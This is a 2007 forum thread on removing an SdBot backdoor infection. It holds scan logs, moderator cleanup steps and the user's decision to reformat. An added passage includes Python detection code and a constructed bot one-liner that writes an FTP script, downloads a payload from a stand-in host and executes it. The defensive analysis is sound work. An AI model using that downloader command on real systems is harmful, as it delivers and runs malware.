C:\Documents and Settings\Sys\Desktop\SPYWARE\SmitfraudFix.exe/data.rar/SmitfraudFix/Reboot.exe Infected: not-a-virus:RiskTool.Win32.Reboot.f skipped
C:\Documents and Settings\Sys\Desktop\SPYWARE\SmitfraudFix.exe/data.rar Infected: not-a-virus:RiskTool.Win32.Reboot.f skipped
C:\Documents and Settings\Sys\Desktop\SPYWARE\SmitfraudFix.exe RarSFX: infected - 2 skipped
C:\Documents and Settings\Sys\Desktop\SPYWARE\SmitfraudFix.exe PE_Patch.UPX: infected - 2 skipped
C:\Documents and Settings\Sys\Desktop\SPYWARE\SmitfraudFix.zip/SmitfraudFix/Reboot.exe Infected: not-a-virus:RiskTool.Win32.Reboot.f skipped
C:\Documents and Settings\Sys\Desktop\SPYWARE\SmitfraudFix.zip ZIP: infected - 1 skipped
C:\Documents and Settings\Sys\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat Object is locked skipped
C:\Documents and Settings\Sys\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat.LOG Object is locked skipped
C:\Documents and Settings\Sys\Local Settings\History\History.IE5\index.dat Object is locked skipped
C:\Documents and Settings\Sys\Local Settings\History\History.IE5\MSHist012007021220070213\index.dat Object is locked skipped
C:\Documents and Settings\Sys\Local Settings\Temporary Internet Files\Content.IE5\index.dat Object is locked skipped
C:\Documents and Settings\Sys\NTUSER.DAT Object is locked skipped
C:\Documents and Settings\Sys\ntuser.dat.LOG Object is locked skipped
C:\Program Files\eScan\MAILDISP.LCK Object is locked skipped
C:\Program Files\eScan\MAILDSP1.LCK Object is locked skipped
C:\Program Files\eScan\SPOOLER.LCK Object is locked skipped
C:\RECYCLER\S-1-5-21-1085031214-823518204-839522115-1003\Dc9\backups\backups.zip/backups/i Infected: Trojan-Downloader.BAT.Ftp.ab skipped
C:\RECYCLER\S-1-5-21-1085031214-823518204-839522115-1003\Dc9\backups\backups.zip ZIP: infected - 1 skipped
C:\System Volume Information\_restore{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP211\A0052115.exe Infected: Backdoor.Win32.SdBot.beb skipped
C:\System Volume Information\_restore{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP211\A0052116.exe Infected: Backdoor.Win32.SdBot.beb skipped
C:\System Volume Information\_restore{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP211\A0052119.exe Infected: Backdoor.Win32.SdBot.beb skipped
C:\System Volume Information\_restore{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP211\A0052156.exe Infected: Backdoor.Win32.SdBot.beb skipped
C:\System Volume Information\_restore{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP212\A0053390.exe Infected: Backdoor.Win32.SdBot.beb skipped
C:\System Volume Information\_restore{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP212\A0053405.exe Infected: Backdoor.Win32.SdBot.beb skipped
C:\System Volume Information\_restore{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP212\A0053420.exe Infected: Backdoor.Win32.SdBot.beb skipped
C:\System Volume Information\_restore{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP212\A0053467.exe Infected: Backdoor.Win32.SdBot.beb skipped
C:\System Volume Information\_restore{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP212\A0053498.exe Infected: Backdoor.Win32.SdBot.beb skipped
C:\System Volume Information\_restore{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP212\A0053531.exe Infected: Backdoor.Win32.SdBot.beb skipped
C:\System Volume Information\_restore{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP212\A0053553.exe Infected: Backdoor.Win32.SdBot.beb skipped
C:\System Volume Information\_restore{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP212\A0053569.exe Infected: Backdoor.Win32.SdBot.beb skipped
C:\System Volume Information\_restore{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP212\A0053586.exe Infected: Backdoor.Win32.SdBot.beb skipped
C:\System Volume Information\_restore{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP212\A0053603.exe Infected: Backdoor.Win32.SdBot.beb skipped
C:\System Volume Information\_restore{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP212\A0053647.exe Infected: Backdoor.Win32.SdBot.beb skipped
C:\System Volume Information\_restore{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP217\change.log Object is locked skipped
C:\WINDOWS\Debug\oakley.log Object is locked skipped
C:\WINDOWS\Debug\PASSWD.LOG Object is locked skipped
C:\WINDOWS\SchedLgU.Txt Object is locked skipped
C:\WINDOWS\Sti_Trace.log Object is locked skipped
C:\WINDOWS\system32\ajj.exe Infected: not-a-virus:AdWare.Win32.Aureate.d skipped
C:\WINDOWS\system32\config\AppEvent.Evt Object is locked skipped
C:\WINDOWS\system32\config\default Object is locked skipped
C:\WINDOWS\system32\config\default.LOG Object is locked skipped
C:\WINDOWS\system32\config\SAM Object is locked skipped
C:\WINDOWS\system32\config\SAM.LOG Object is locked skipped
C:\WINDOWS\system32\config\SecEvent.Evt Object is locked skipped
C:\WINDOWS\system32\config\SECURITY Object is locked skipped
C:\WINDOWS\system32\config\SECURITY.LOG Object is locked skipped
C:\WINDOWS\system32\config\software Object is locked skipped
C:\WINDOWS\system32\config\software.LOG Object is locked skipped
C:\WINDOWS\system32\config\SysEvent.Evt Object is locked skipped
C:\WINDOWS\system32\config\system Object is locked skipped
C:\WINDOWS\system32\config\system.LOG Object is locked skipped
C:\WINDOWS\system32\config\systemprofile\Cookies\index.dat Object is locked skipped
C:\WINDOWS\system32\config\systemprofile\Local Settings\History\History.IE5\index.dat Object is locked skipped
C:\WINDOWS\system32\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\index.dat Object is locked skipped
C:\WINDOWS\system32\eraseme_21230.exe Infected: Backdoor.Win32.SdBot.aad skipped
C:\WINDOWS\system32\h323log.txt Object is locked skipped
C:\WINDOWS\system32\i Infected: Trojan-Downloader.BAT.Ftp.ab skipped
C:\WINDOWS\system32\wbem\Repository\FS\INDEX.BTR Object is locked skipped
C:\WINDOWS\system32\wbem\Repository\FS\OBJECTS.DATA Object is locked skipped
C:\WINDOWS\Temp\kav1.tmp Object is locked skipped
C:\WINDOWS\wiadebug.log Object is locked skipped
C:\WINDOWS\wiaservc.log Object is locked skipped
D:\System Volume Information\_restore{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP217\change.log Object is locked skipped
F:\Zip\GDiVX 1.9.1.exe/data0007/SaveNow.exe Infected: not-a-virus:AdWare.Win32.SaveNow.w skipped
F:\Zip\GDiVX 1.9.1.exe/data0007/Uninst.exe Infected: not-a-virus:AdWare.Win32.SaveNow.au skipped
F:\Zip\GDiVX 1.9.1.exe/data0007 Infected: not-a-virus:AdWare.Win32.SaveNow.au skipped
F:\Zip\GDiVX 1.9.1.exe NSIS: infected - 3 skipped

Scan process completed.
Feb 12 2007, 09:20 PM, Post #17
I hate computers (Group: Moderators, Posts: 8,645, Joined: 12-April 05, Member No.: 1,352)
Download Killbox from Here
Click killbox.exe.
Select the option "Delete on reboot".
Click the button: All Files (Important!). Now it should flash green.
Next copy the contents of the code box to the clipboard by left clicking and covering the text, then right click inside the highlighted area and choose Copy:

CODE
C:\WINDOWS\system32\eraseme_21230.exe
C:\WINDOWS\system32\i
C:\WINDOWS\system32\ajj.exe

After copying the above text to the clipboard, click File on the Killbox menu bar and choose Paste From Clipboard.
Then press the Delete File button (Red Circle with a White X).
Killbox will tell you that all listed files will be removed on next reboot and asks if you would like to Reboot now; click YES. If you don't get that message, reboot manually. Your computer should reboot now.

Then after reboot upload the C:\!Killbox folder to the same topic they opened at Spykillers. It may also be worth trying a different scanner such as Panda to make sure there's nothing else to remove.

Run Panda Activescan from Here.
Once you are on the Panda site click the Scan your PC button
- A new window will open...click the Check Now button
- Enter your Country
- Enter your State/Province
- Enter your e-mail address and click send
- Select either Home User or Company
- Click the big Scan Now button
- If it wants to install an ActiveX component allow it
- It will start downloading the files it requires for the scan (Note: It may take a couple of minutes)
- When the download is complete, click on Local Disks to start the scan
- When the scan completes, if anything malicious is detected, click the See Report button, then Save Report and save it to a convenient location so you can post it back.
Feb 13 2007, 11:28 AM, Post #18
Member (Group: Members, Posts: 16, Joined: 4-February 07, Member No.: 10,964)
1) I ran killbox.exe and followed your instructions, but I couldn't upload the iKill folder; my internet connection is getting very slow!!!!! Any suggestion about how to correct this dead slow internet connection? Please advise.

2) Panda scan report:

Incident / Status / Location
Adware:adware/ipinsight Not disinfected c:\windows\system32\sentry.sys
Adware:adware/powerstrip Not disinfected Windows Registry
Virus:W32/Sdbot.ftp.worm Disinfected C:\!KillBox\( 1)
Spyware:Cookie/PointRoll Not disinfected C:\Documents and Settings\Sys\Cookies\sys@ads.pointroll[2].txt
Spyware:Cookie/Advertising Not disinfected C:\Documents and Settings\Sys\Cookies\sys@advertising[1].txt
Spyware:Cookie/Atlas DMT Not disinfected C:\Documents and Settings\Sys\Cookies\sys@atdmt[2].txt
Spyware:Cookie/Casalemedia Not disinfected C:\Documents and Settings\Sys\Cookies\sys@casalemedia[2].txt
Spyware:Cookie/Doubleclick Not disinfected C:\Documents and Settings\Sys\Cookies\sys@doubleclick[1].txt
Spyware:Cookie/FastClick Not disinfected C:\Documents and Settings\Sys\Cookies\sys@fastclick[1].txt
Spyware:Cookie/FastClick Not disinfected C:\Documents and Settings\Sys\Cookies\sys@media.fastclick[1].txt
Spyware:Cookie/Overture Not disinfected C:\Documents and Settings\Sys\Cookies\sys@overture[1].txt
Spyware:Cookie/Tribalfusion Not disinfected C:\Documents and Settings\Sys\Cookies\sys@tribalfusion[2].txt
Potentially unwanted tool:Application/Processor Not disinfected C:\Documents and Settings\Sys\Desktop\BMK\SmitfraudFix\Process.exe
Potentially unwanted tool:Application/Processor Not disinfected C:\Documents and Settings\Sys\Desktop\BMK\SmitfraudFix\SmitfraudFix\Process.exe
Potentially unwanted tool:Application/Processor Not disinfected C:\Documents and Settings\Sys\Desktop\SDFix.exe[SDFix\apps\Process.exe]
Potentially unwanted tool:Application/Processor Not disinfected C:\Documents and Settings\Sys\Desktop\SPYWARE\SmitFraudFix\SmitfraudFix\Process.exe
Potentially unwanted tool:Application/Processor Not disinfected C:\Documents and Settings\Sys\Desktop\SPYWARE\SmitfraudFix.zip[SmitfraudFix/Process.exe]
Potentially unwanted tool:Application/Processor Not disinfected C:\RECYCLER\S-1-5-21-1085031214-823518204-839522115-1003\Dc9\apps\Process.exe
Virus:W32/Sdbot.ftp.worm Disinfected C:\RECYCLER\S-1-5-21-1085031214-823518204-839522115-1003\Dc9\backups\backups.zip[backups/i]
Adware:Adware/Aureate-Radiate Not disinfected C:\WINDOWS\system32\GMAGlue.exe
Virus:W32/Sdbot.ftp.worm Disinfected C:\WINDOWS\system32\i
Potentially unwanted tool:Application/Processor Not disinfected C:\WINDOWS\system32\Process.exe
Adware:Adware/Aureate-Radiate Not disinfected D:\Program Files\Group Mail\BACKUP\GMAGlue.exe
Adware:Adware/Aureate-Radiate Not disinfected D:\Program Files\Group Mail\BACKUP\GMAGlue.001
Adware:Adware/Aureate-Radiate Not disinfected F:\Zip\Group Mail Plus v3.4.071 with serial\infactagmplus.exe[GMAGLUE.EXE]
Feb 13 2007, 02:16 PM, Post #19
Power Member (Group: Spyware Moderators, Posts: 1,821, Joined: 12-January 06, From: Manchester, UK, Member No.: 3,836)
Hi Buchi and RRidgely
Buchi, can you right click the C:\!Killbox folder and choose Send To > Compressed (zipped) Folder, then upload the C:\!Killbox.zip folder to Spykillers? The file that has been uploaded is a log file from Killbox, but it's the files inside the folder that I'd like to test.

You appear to still have an active backdoor infection on your system. SDFix removed the i file in the system32 folder, but it was then found again by Kaspersky; Killbox was then used to remove it and now it's been found again by Pandascan, so something is putting the file back each time it's removed.

Any time a backdoor is found a format and reinstall of the OS should be considered, as it means the attacker has full access to your system (in this case using IRC channels). We will of course do our best to clean the computer of any infections that we can see, but depending on what this system is used for you may want to consider reinstalling Windows to be sure it's safe to use in the future (for logging into confidential sites such as banking, Paypal, Ebay, Email etc...).

Please read through this topic as it applies to your situation: When Should I Format, How Should I Reinstall

Should you wish to continue with the cleanup then please upload the C:\Killbox.zip folder to SpyKillers so I can check the eraseme_(random number) file, as it's a backdoor trojan installer; I can then see what files or services it's attempting to add, which may help to find the solution. Please also post a new HijackThis log into this thread and let us know if this system is connected to a home network.

Finally please post the contents of the Add/Remove screen to make sure there are no additional malware programs listed:

Open Hijackthis, and click the Misc Tools button. Then click the Open Uninstall Manager... button. The Add/Remove Programs Manager panel should appear. In this panel click the Save list button. Save the uninstall_list.txt file to your desktop and copy and paste the contents back in your next reply.

Thanks
Andy
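Andy's point above is that C:\WINDOWS\system32\i keeps coming back after each removal. The scanner names on this page (Trojan-Downloader.BAT.Ftp, W32/Sdbot.ftp.worm) point at the usual SdBot mechanism: the bot writes a short ftp.exe command script and runs it with ftp -s:<file> to pull its next payload, so a file named i will be rewritten every time the bot fires. The thread never shows the file's contents, so the Python below is an added example (not from the thread) that works on a constructed script and a constructed command line of the form such bots use; the host 192.0.2.10, the port and the payload name x.exe are made up. It extracts where the script connects and what it fetches, and finds the ftp -s: launch in a command line, which is what you would look for in a process-creation log when hunting for whatever is recreating the file.

```python
import re

# Constructed sample of the ftp.exe command script an SdBot-style bot drops.
# Host, port and payload name are made up (192.0.2.10 is a documentation
# address); the real file from this thread is not shown anywhere on the page.
SAMPLE_SCRIPT = """\
open 192.0.2.10 1234
user a a
binary
get x.exe
bye
"""

# Constructed sample of the one-liner such bots run on a freshly compromised
# host: write the script with echo, run it non-interactively, execute the payload.
SAMPLE_CMDLINE = (
    "cmd /c echo open 192.0.2.10 1234 > i & echo user a a >> i & "
    "echo binary >> i & echo get x.exe >> i & echo bye >> i & ftp -n -s:i & x.exe"
)

# ftp [-n] [-v] ... -s:<scriptfile>
FTP_RUN_RE = re.compile(r"\bftp(?:\.exe)?\s+(?:-\w\s+)*-s:(\S+)", re.IGNORECASE)
EXECUTABLE_SUFFIXES = (".exe", ".dll", ".bat", ".cmd", ".scr", ".pif", ".com")


def parse_ftp_script(text):
    """Pull the connection target, login and fetched files out of an ftp.exe script."""
    info = {"host": None, "port": 21, "user": None, "fetched": []}
    for line in text.splitlines():
        parts = line.strip().split()
        if not parts:
            continue
        verb = parts[0].lower()
        if verb == "open" and len(parts) >= 2:
            info["host"] = parts[1]
            if len(parts) >= 3 and parts[2].isdigit():
                info["port"] = int(parts[2])
        elif verb == "user" and len(parts) >= 2:
            info["user"] = parts[1]          # 'user a a' supplies name and password in one line
        elif verb in ("get", "recv", "mget") and len(parts) >= 2:
            info["fetched"].extend(parts[1:])
    return info


def is_downloader_script(text):
    """True when the script connects somewhere and pulls down something executable."""
    info = parse_ftp_script(text)
    return info["host"] is not None and any(
        f.lower().endswith(EXECUTABLE_SUFFIXES) for f in info["fetched"])


def ftp_script_launches(cmdline):
    """Script file names passed to ftp -s: in a command line (process-creation log)."""
    return [m.group(1) for m in FTP_RUN_RE.finditer(cmdline)]


if __name__ == "__main__":
    print(parse_ftp_script(SAMPLE_SCRIPT))
    print("downloader:", is_downloader_script(SAMPLE_SCRIPT))
    print("launched via:", ftp_script_launches(SAMPLE_CMDLINE))
```

The launch pattern matters more than the script itself: the script is only a text file and deleting it changes nothing, whereas the process that runs ftp -s: (and the process that spawned it) is the thing that has to go, which is the reasoning behind Andy's advice to consider a rebuild once the dropper is seen to be still live.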
Feb 15 2007, 12:23 PM, Post #20
Member (Group: Members, Posts: 16, Joined: 4-February 07, Member No.: 10,964)
Thank you Rridgely & Andy. I decided to format my system and install the components again, as it is safe & secure for important data.
Besides, my knowledge is also not sufficient to do tougher work. I really appreciate Rridgely for the best support offered to me, but I think my system is highly infected. Thank you so much Rridgely and Andy.